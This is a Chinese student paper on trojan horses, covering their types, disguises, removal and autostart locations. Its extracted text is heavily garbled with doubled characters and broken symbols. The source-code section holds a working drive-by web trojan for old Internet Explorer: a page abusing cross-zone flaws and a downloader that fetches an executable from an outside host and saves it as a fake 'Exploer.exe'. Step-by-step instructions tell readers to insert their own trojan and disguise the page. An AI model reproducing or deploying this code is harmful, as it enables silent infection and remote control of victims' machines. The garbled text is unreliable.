信息安全论文17148.docx

《信息安全论文17148.docx》由会员分享，可在线阅读，更多相关《信息安全论文17148.docx（16页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、题目：木木马作者：芦芦存博 20007544011178宋婷 200075540111666徐丽亚220077540011886王笑瑜220077540010445摘要：木木马是特特洛伊木木马的简简称，是是一种在在远程计计算机之之间建立立起连接接，使远远程计算算机能通通过网络络控制本本地计算算机上的的程序。它它冒名顶顶替，以以人们所所知晓的的合法而而正常的的程序（如如计算机机游戏，压压缩工具具乃至防防治计算算机病毒毒软件等等）面目目出现，来来达到欺欺骗欲获获得该合合法程序序的用户户将之在在计算机机上运行行，产生生用户所所料不及及的破坏坏后果之之目的。通通俗地讲讲，木马马就是一一种“挂羊头头，卖

2、狗狗肉”的实施施破坏作作用的计计算机程程序。关键词：类型；伪装方方式；查查杀方法法；源代代码；工工作原理理；反查查杀技术术0 引言言 从本质质上讲，木木马程序序属于远远程管理理工具的的范畴，如如PCAAnyWWherre等，其其目的在在于通过过网络进进行远程程管理控控制。木木马和远远程控制制软件的的区别在在于木马马具有隐隐蔽性，远远程控制制软件的的服务器器端在目目标计算算机上运运行时，目目标计算算机会出出现很醒醒目的标标志，而而木马类类软件的的服务器器端在运运行时则则使用多多种手段段来隐藏藏自己。1,木马马的类型型(1) 破坏型型 这种木木马是很很令人讨讨厌的，这这个病毒毒可以自自动的删删除电

3、脑脑上的重重要文件件，例如如dLLL、INNI、EEXE文文件。(2) 密码发发送型 主要是是用来盗盗窃用户户隐私信信息的，他他可以把把隐藏的的密码找找出来发发送到指指定的信信箱。也也可以用用来盗窃窃用户的的敏感口口令等。同同时，此此类病毒毒最重要要的是会会记录操操作者的的键盘，找找到相关关的有用用的信息息。(3) 远程访访问型 使用最最多既木木马。入入侵者运运行了客客户端，使使用木马马者就可可以通过过远程连连接到对对方电脑脑，访问问对方电电脑资源源。(4) 键盘记记录木马马 这种键键盘木马马一般都都制作的的很短小小精悍，主主要用来来记录中中木马者者的键盘盘敲击记记录，并并且根据据网络访访问情

4、况况，给木木马使用用者发送送到指定定的信箱箱等。(5) DOSS攻击型型 DOSS的全称称是洪水水式服务务攻击。是是用来请请求服务务器请求求，让服服务器忙忙与处理理应答，而而占用了了大量的的资源，最最后服务务器资源源耗尽而而死机。使使用多台台电脑DDOS攻攻击取得得的效果果更好，可可以用他他来慢慢慢攻击更更多的电电脑。(6) 代理木木马 可以把把自己的的电脑从从其他地地方代理理，然后后重新访访问网络络服务器器，起一一个中转转的作用用。(7) FTPP木马 FTPP木马容容量也很很小，一一般情况况下是用用来打开开21端端口来等等待用户户连接。(8) 程序杀杀手木马马 主要是是用来关关闭一些些监控

5、软软件等，这这样就可可以让木木马更安安全的保保留在系系统中，防防止被监监控软件件发现，从从而对用用户造成成数据丢丢失，敏敏感信息息泄露等等故障。(9) 反弹端端口型木木马反弹端口口是为了了躲避防防火墙的的过滤而而制作的的。因为为防火墙墙会对连连入的链链接做一一个很严严格的过过滤，对对于连出出的链接接可能就就不是那那么严格格了，所所以利用用这一点点，把端端口反弹弹，就可可以更安安全的使使用了。2,木马马的伪装装方式（1）修修改图标标对木马程程序的图图标进行行修改，从从而伪装装成其他他类型文文件，以以达到欺欺骗用户户的目的的。现在在有的木木马已经经可以将将木马服服务器端端程序的的图标改改成HTTM

6、L,TXTT,ZIIP等各各种文件件的图标标，具有有相当大大的迷惑惑性。（2）出出错显示示如果打开开一个文文件后没没有任何何反应，这这很可能能就是个个木马程程序，木木马的设设计者也也意识到到了这个个缺陷，所所以已经经有木马马提供了了一个叫叫做出错错显示的的功能。当当服务器器端用户户打开木木马程序序时，会会弹出一一个错误误提示框框（当然然是假的的），错错误内容容可自由由定义，大大多会定定制成一一些诸如如“文件已已破坏，无无法打开开！”之类的的信息，当当服务器器端用户户信以为为真时，木木马却悄悄悄侵入入了系统统。( 3)定制端端口很多老式式的木马马端口都都是固定定的，这这给判断断是否感感染了木木马

7、带来来了方便便，只要要查一下下特定的的端口就就知道感感染了什什麽木马马，所以以现在很很多新式式的木马马都加入入了定制制端口的的功能，控控制端用用户可以以10224655535之之间任选选一个端端口作为为木马端端口，这这样就给给判断所所感染的的木马类类型带来来了麻烦烦(4)自自我销毁毁当服务器器端用户户打开含含有木马马的文件件后，木木马会将将自己复复制到wwinddowss的系统统文件夹夹中。一一般来说说源木马马文件和和系统文文件夹中中的木马马文件的的大小是是一样的的（捆绑绑文件的的木马除除外），那那么中了了木马的的系统只只要在近近来收到到的心间间和下载载的软件件中找到到源木马马文件，然然后根据

8、据源木马马的大小小去系统统文件夹夹中找到到相同大大小的文文件，判判断一个个哪个是是木马就就行了。木木马的自自我销毁毁功能弥弥补了木木马的这这一缺陷陷。当安安装完木木马后，源源木马文文件将自自动销毁毁，这样样服务器器端用户户就很难难找到木木马的来来源，在在没有查查杀木马马的工具具帮助下下，就很很难删除除木马了了。（5）木木马更名名安装到系系统文件件夹中的的木马的的文件名名一般是是固定的的，那么么只要根根据一些些查杀木木马的文文章，在在系统文文件夹中中查找特特定的文文件，就就可以断断定中了了什么木木马。所所以现在在有很多多木马都都允许控控制端用用户自由由定制安安装后的的木马文文件名，这这样就很很难

9、判断断所感染染的木马马类型了了。(6)捆捆绑文件件将木马捆捆绑到一一个安装装程序上上，当安安装程序序运行时时，木马马在用户户毫无察察觉的情情况下，偷偷地进入系统。也可以将木马和一张图片捆绑，当用户打开“图片”时，木马就在后台不知不觉地运行了。3,木马马的查杀杀方法木马的清清除方法法，可以以总结为为监视端端口，监监视文件件，监视视进程，监监视进程程模块和和监视注注册表，一一旦发现现木马，然然后采取取相应的的清除措措施。木马的本本质是程程序，必必须运行行起来后后才能工工作，所所以必定定会在系系统中留留下一些些蛛丝马马迹。下下面针对对一些常常用木马马所惯用用的伎俩俩来找出出躲在系系统中的的木马。检查

10、是否否存在陌陌生进程程，检查查注册表表，检查查开放的的端口，使使用冰刃刃进行检检查，监监控注册册表的变变化。通通过以上上方法，基基本能确确定系统统中是否否存在木木马。 手手工清除除木马的的步骤是是：找到到木马文文件，结结束木马马进程，删删除木马马文件进进行善后后处理 当然然，木马马查找和和清除的的最好办办法还是是借助于于专门的的软件实实现。专专业的木木马清除除工具有有Troojann Huunteer和AAVG Antti-SSpywwaree(Ewwidoo)等4,木马马的源代代码及工工作原理理funcctioon iicyffoxlloveelacce(ƹ /得到到系统统

11、目录和和系统盘盘url=doccumeent.loccatiion.hreef;xtmuu=urrl.ssubsstriingƐ6,urll.inndexxOfƐ,9)+1ƛxtp=urll.suubsttr(6,33ƹvar sheell=neww AcctivveXOObjeectƐ&qquott;shhelll.apppliicattionn&quuot;ƹvar runnbz=1;/此处处设置木木马程序序的大小小，以字字节为单单位/请把把19882011改为你你的木马马程序的的实际大大小var exeeSizz

12、e=11982201;/设置置木马程程序名及及扩展名名Ƹeexe,comm,baat,ppif,scrrƹ，用用于判断断是否是是所下载载的木马马程序/请把把下面两两行中的的icyyfoxx改为你你的木马马程序名名，baat改为为你的木木马程序序的扩展展名var a=/icyyfoxx[d*].bbat/gi;a.coompiileƐ&qquott;iccyfooxϟd*Υ.baat&qquott;,&quoot;ggi&qquott;)var b=/ϟAA-Zaa-zΥ:/gi;b.coomp

13、iileƐ&qquott;[A-ZZa-zzϡɌ&quoot;,&quuot;gi&quoot;ƛ/正则则表达式式,用于于判断是是否是盘盘的根目目录/下面面的代码码查找并并运行木木马程序序wjjƐxttmu+&quuot;Temmporraryy Innterrnett Fiiless&quoot;ƛ/Coonteent.IE55if(runnbzƛwjjj(xtpp+&qquott;Doocummentts aand Setttinngs&qquott;)if(runnbzƛ

14、;yppƸƛ/在所所有硬盘盘分区下下查找并并运行木木马程序序funcctioon yyp(ƹ try var c=nnew Enuumerratoor(sheell.nammesppaceeƸ&quoot;ccȮ&qquott;).PaarenntFooldeer.IItemms(ƹƛfor Ƹ!c.atEEndƐ)c.movveNeextƐ)ƹ if(runnbzƛ ifƐb.tesst(c.iite

15、mmƸƛ.ppathhƹƛwjjj(c.iitemmƸƛ.ppathhƹ elsee brreakk;cattchƐeƛ /利用用递归在在指定目目录(包括子子目录ƛ下查查找并运运行木马马程序funcctioon wwjjƐbƛ try var c=nnew Enuumerratoor(sheell.nammesppaceeƸbbƹ.IteemsƐ)ƹfor Ƹ!c.atEEndƐ

16、1;c.movveNeextƐ)ƹ if(runnbz&p;&aamp;c.iitemmƸƛ.SSizee=eexeSSizee&ammp;&p;a.tesst(c.iitemmƸƛ.ppathhƹƛ var f=cc.ittemƐ).paath;var v=ff.laastIIndeexOffƸƹ+1;try shelll.nnameespaaceƐf.subbstrringgƸ00,vƛ).ittem

17、ssƸƛ.iitemmƸff.suubsttr(v)ƹ.invvokeeverrb(ƹ/运运行木马马程序runbbz=00;breaak; ccatcch(e) if(!c.iteem(ƹ.Sizze)wjjjƸcc.ittemƐ).paath+&quuot;&quoot;ƛ/如果果是子目目录则递递归调用用cattchƐeƛ icyffoxlloveelacce(ƹ请把以上上代码保保存为iicyf

18、fox.js。 接下来来我们就就要利用用一个小小小跨域域执行漏漏洞，来来获得&quoot;我我的电脑脑&quuot;域的网网页权限限，大家家以前是是不是和和我一样样觉得这这种漏洞洞仅仅只只能用来来进行跨跨站脚本本攻击，得得到COOOKIIE之类类的东东东呢？这这次它终终于可以以露脸啦啦！代码码如下：<HTMML&ggt;<HEAAD&ggt;<METTAhttpp-eqquivv=Coonteent-Typpe conttentt=&qquott;teext/htmml; chaarseet=ggb23312&quoot;><TITTLE>冰狐浪浪子网络络技

19、术实实验室的的完美网页页木马</TIITLEE>t;</HEEAD><BODDY oncoonteextmmenuu=&qquott;reeturrn falsse&qquott; onseelecctsttartt=&qquott;reeturrn falsse&qquott; scrooll=&quuot;no&quoot; topmmarggin=&quuot;0&qquott; llefttmarrginn=&qquott;0&quoot;><SCRRIPTT LAANGUUAGEE=&qquott;iccyfooxloovellacee&quu

20、ot; srrc=&quoot;hhttppȮ/wwww.ggodoog.yy3655.coom/wwodeemumma/iicyffox.batt&quuot;>t;&llt;/SCRRIPTT>t;<SCRRIPTT LAANGUUAGEE=&qquott;JaavaSScriipt&quoot;>/此处处设置上上面iccyfoox.jjs文件件的网络络地址/请把把htttp:/wwww.goddog.y3665.ccom/woddemuuma/icyyfoxx.jss改为你你的iccyfoox.jjs文件件实际上上传地址址jsurrl=&quoot;

21、hhttppȮ/wwww.ggodoog.yy3655.coom/wwodeemumma/iicyffox.js&quoot;.repplacce(/g,/)WIE=navvigaatorr.apppVeersiion;if(WIEE.inndexxOfƐ&qquott;MSSIE 5.00&quuot;ƹ>-1ƛ /*IEE 5.0利用用ifrramee标签,srcc属性设设为iccyfoox:/则则会使此此标签具具备&qquott;我的的电脑&quoot;域域的权限限,原因因是因为为icyyfoxxȮ/

22、是不不存在的的协议，所所以会会利利用rees:/协协议打开开SHDDOCLLC.DDLL中中的语法法错误页页synntaxx.httm，而而且SHHDOCCLC.DLLL又位于于系统目目录中，为为在iccyfoox.jjs中得得到系系统目录录和系统统盘提供供数据；*/docuumennt.wwritte(&quuot;<t;ifframme sstylle=dissplaay:nonne; naame=iccyfooxloovellacee ssrc=iccyfoox:/>t;&llt;/ifframme&ggt;&quoot;ƛsetTTim

23、eeouttƸ&quoot;mmumaa0(ƹ&quoot;,10000)elsee /*IEE5.55、IEE6.00则利用用_seearcch漏洞洞，把打打开的地地址设为为icyyfoxxȮ/，从从而使_seaarchh搜索框框具备&quoot;我我的电脑脑&quuot;域的权权限，因因为在IIE6.0中无无法用上上面的iifraame漏漏洞，IIE5.5应该该可以用用，我没没有测试试。这样样做的结结果会打打开搜索索栏,有有点遗憾憾！*/winddow.opeen(&quuot;icyyfoxxȮ/&qquott;,&quoo

24、t;_seaarchh&quuot;ƹsetTTimeeouttƸ&quoot;mmumaa1(ƹ&quoot;,10000)/下面面利用ffileeȮjjavaascrripttȮ协协议漏洞洞在已是是我的电电脑&qquott;域的的权限的的&quuot;icyyfoxxȮ/&qquott;中插插入iccyfoox.jjs脚本本并运行行funcctioon mmumaa0(ƹ winddow.opeen(&quuot;fille:javvasccrippt:doccumeent

25、.alll.taagsƐSSCRIIPTƹΏ0Υ.ssrc=&qquott;+jjsurrl+&quoot;evvalƐ)&qquott;,&quoot;iicyffoxlloveelacce&qquott;)funcctioon mmumaa1(ƹ winddow.opeen(&quuot;fille:javvasccrippt:doccumeent.alll.taagsƐSSCRIIPTƹΏ0Υ.ssrc=&qquott;+jjsurrl+&q

26、uoot;evvalƐ)&qquott;,&quoot;_seaarchh&quuot;ƹ </SCCRIPPT&ggt;</BOODY><NOSSCRIIPT><t;ifframme sstylle=&quoot;ddispplayyȮnnonee;&qquott; ssrc=*.*><t;/iifraame><t;/NNOSCCRIPPT&ggt;</HTTML>把上面的的代码保保存为iicyffox.htmm,如果果你愿意意可以把把扩展名名改为jjpg并并在网页页中加入入一个精精美的图

27、图片背景景，来做做一个图图片木马马，甚至至你可以以改为eexe，来来冒充一一个好的的程序的的下载地地址，并并在网页页的&llt;HHEADD>t;&llt;/HEAAD&ggt;中中加入标标签&llt;mmetaahtttp-eequiiv=&quoot;rrefrreshh&quuot; coonteent=&quuot;5;uurl=htttpɌ/m/wiinraar.eexe&quuot;>t;来定定时转到到另一个个真正的的程序下下载地址址，从而而更好的的欺骗别别人。 如如果你觉觉得wiin988没必要要控制的的话，还还有更好好的木马马等着你你，不知知大家是是否用过过w

28、inn20000、wwinxxp等系系统中默默认安装装的ADDODBB.Sttreaam及MMicrrosooft.XMLLHTTTP控件件？它们们可是和和sheell.apppliccatiion控控件一样样是经过过了安全全认证的的，可以以在&qquott;我的的电脑&quoot;域域中的网网页中畅畅通无阻阻执行的的好东西西呀！请请看下面面的代码码：funcctioon iicyffoxƐ) /设置置下载后后保存在在系统目目录下的的木马程程序名，我我设的是是不是很很象Exxploorerr.exxe呀？呵呵var namme=&quoot;EExpllroeer.eexe&

29、quoot;/设置置你要下下载的木木马程序序的地址址（此处处你可以以把扩展展名任意意改，甚甚至没有有扩展名名也可以以的)/可以以更好的的躲过免免费主页页空间的的上传限限制var urll=&qquott;htttpɌ/m/woodemmumaa/iccyfoox.bbat&quoot;try var follderr=doocummentt.loocattionn.hrref;foldder=follderr.suubsttrinng(6,ffoldder.inddexOOf(,99ƹ+1)+naame;var xmll=neew AActi

30、iveXXObjjecttƸ&quoot;MMicrrosooft.XMLLHTTTP&qquott;)xml.opeen(&quuot;GETT&quuot;,urrl,ffalsse)xml.sennd(ƹif(xmll.sttatuus=2000ƹ var adoo=neew AActiiveXXObjjecttƸ&quoot;AADODDB.SStreeam&quoot;ƛado.Typpe=11;ado.Opeen(ƹado.wriiteƐxmml.rresppons

31、seBoodyƛado.SavveTooFille(follderr,2ƛado.ClooseƐ)ado=nulll;xml=nulll;docuumennt.bbodyy.innserrtAddjaccenttHTMML(AffterrBeggin,<OBJJECTT sttylee=&qquott;diispllayɌnoone;&quuot; TYYPE=&quuot;apppliccatiion/x-ooleoobjeect&quoot; CODDEBAASE=&quuot;+ffoldder+&qquott;&gg

32、t;</OBBJECCT&ggt;ƹcatcch(e) icyffoxƐ)把上面的的的代码码保存为为icyyfoxx.jss替换上上面保存存的iccyfoox.jjs文件件，同样样利用上上面的iicyffox.htmm来注入入到&qquott;我的的电脑&quoot;域域中，呵呵呵你就就偷这乐乐吧！最后后还请大大家发挥挥以下DDIY的的能力把把上面两两种代码码合二为为一，我我相信一一个现阶阶段最最最完美的的网网页木马马就会在在你手中中诞生啦啦！是不不是神不不知鬼不不觉？提示代码码如下：try neew AActiiveXXObjjectt

33、40;&quoot;AADODDB.SStreeam&quoot;ƛiicyffoxƐ) cattchƐeƛ icyyfoxxlovvelaaceƐ) 一一般的木木马程序序都包括括客户端端和服务务端两个个程序，其其申客户户端是用用于攻击击者远程程控制植植入木马马的机器器，服务务器端程程序即是是木马程程序。攻攻击者要要通过木木马攻击击你的系系统，他他所做的的第一步步是要把把木马的的服务器器端程序序植人到到你的电电脑里面面。目前木马马入侵的的主要途途径还是是先通过过一定的的方法把把木马执执行文件件弄到被被攻击者者的电脑脑系统里里，利

34、用用的途径径有邮件件附件、下下载软件件中等，然然后通过过一定的的提示故故意误导导被攻击击者打开开执行文文件，比比如故意意谎称这这个木马马执行文文件，是是你朋友友送给你你贺卡，可可能你打打开这个个文件后后，确实实有贺卡卡的画面面出现，但但这时可可能木马马已经悄悄悄在你你的后台台运行了了。一般般的木马马执行文文件非常常小，大大部分都都是几KK到几十十K，如如果把木木马捆绑绑到其他他正常文文件上，你你很难发发现，所所以，有有一些网网站提供供的软件件下载往往往是捆捆绑了木木马文件件的，你你执行这这些下载载的文件件，也同同时运行行了木马马。木马也可可以通过过Scrriptt、AcctivveX及及Asp

35、p.CGGI交互互脚本的的方式植植入，由由于微软软的浏览览器在执执行Seenippt脚本本存在一一些漏洞洞。攻击击者可以以利用这这些漏洞洞传播病病毒和木木马，甚甚至直接接对浏览览者电脑脑进行文文件操作作等控制制。前不不久献出出现一个个利用微微软Sccrippts脚脚本漏洞洞对浏览览者硬盘盘进行格格式化的的HTMML页面面。如果果攻击者者有办法法把木马马执行文文件下载载到攻击击主机的的一个可可执行WWWW目目录夹里里面，他他可以通通过编制制CGII程序在在攻击主主机上执执行木马马目录。此此外，木木马还可可以利用用系统的的一些漏漏洞进行行植人，如如微软著著名的UUS服务务器溢出出漏洞，通通过一个个

36、IISSHACCK攻击击程序即即可使IIIS服服务器崩崩溃，并并且同时时攻击服服务器，执执行远程程木马执执行文件件。当服务端端程序在在被感染染的机器器上成功功运行以以后，攻攻击者就就可以使使用客户户端与服服务端建建立连接接，并进进一步控控制被感感染的机机器。在在客户端端和服务务端通信信协议的的选择上上，绝大大多数木木马使用用的是TTCP/IP协协议，但但是也有有一些木木马由于于特殊的的原因，使使用UDDP协议议进行通通讯。当当服务端端在被感感染机器器上运行行以后，它它一方面面尽量把自己隐隐藏在计计算机的的某个角角落里面面，以防防被用户户发现;同时监监听某个个特定的的端口，等等待客户户端与其其取

37、得连连接;另另外为了了下次重重启计算算机时仍仍然能正正常工作作。木马马程序一一般会通通过修改改注册表表或者其其他的方方法让自自己成为为自启动动程序。5,木马马的反查查杀技术术木马是是如何启启动的作为一个个优秀的的木马，自自启动功功能是必必不可少少的，这这样可以以保证木木马不会会因为你你的一次次关机操操作而彻彻底失去去作用。正正因为该该项技术术如此重重要，所所以，很很多编程程人员都都在不停停地研究究和探索索新的自自启动技技术，并并且时常常有新的的发现。一一个典型型的例子子就是把把木马加加入到用用户经常常执行的的程序 (例如如expplorrer.exee)中，用用户执行行该程序序时，则则木马自自

38、动发生生作用。当当然，更更加普遍遍的方法法是通过过修改WWinddowss系统文文件和注注册表达达到目的的，现经经常用的的方法主主要有以以下几种种:1.在WWin.inii中启动动在Winn.inni的winndowws字字段中有有启动命命令lloadd和和ruun，在一一般情况况下 后后面是空空白的，如如果有后后跟程序序，比方方说是这这个样子子：run=c:winndowwsffilee.exxeloadd=c:wiindoowsfille.eexe要小心了了，这个个fille.eexe很很可能是是木马哦哦。2.在SSysttem.inii中启动动Systtem.inii位于WWinddow

39、ss的安装装目录下下，其booot字字段的sshelll=EExplloreer.eexe是是木马喜喜欢的隐隐藏加载载之所，木木马通常常的做法法是将该该何变为为这样:sheell=Expplorrer.exeefille.eexe。注注意这里里的fiile.exee就是木木马服务务端程序序!另外，在在Sysstemm.中的的3886Ennh字字段，要要注意检检查在此此段内的的drriveer路路径程程序名这里也也有可能能被木马马所利用用。再有有，在SSysttem.inii中的micc、driiverrs、driiverrs322这33个字段段，这些些段也是是起到加加载驱动动程序的的作用，但但

40、也是增增添木马马程序的的好场所所，现在在你该知知道也要要注意这这里喽。6,结语语 本论文文包括的的知识点点如下：木马的的类型，一一般的伪伪装方式式，目前前有哪些些方法查查杀，分分析实际际木马的的源代码码以说明明其工作作原理如如主控端端和被控控端如何何联系、被被控端在在被控主主机上有有何行为为，木马马的反查查杀技术术的方法法（如针针对静态态特征和和动态运运行特征征）。本文介绍绍了木马马的类型型，一般般的伪装装方式，目目前有哪哪些方法法查杀，然后分析实际木马的源代码以说明其工作原理如主控端和被控端如何联系、被控端在被控主机上有何行为，最后简单介绍了木马的一些反查杀技术的方法7，参考考文献【1】贺贺雪晨 主编 信息对对抗与网网络安全全（第二二版）清清华大学学出版社社【2】赵赵树升 编著 计算算机病毒毒分析与与防治简简明教程程 清清华大学学出版社社【3】宋宋红 吴吴建军 岳俊梅梅 等编编著 计计算机安安全技术术（修订订版）中中国铁道道出版社社【4】罗罗森林 编著 信息系系统安全全与对抗抗技术 北京理理工大学学出版社社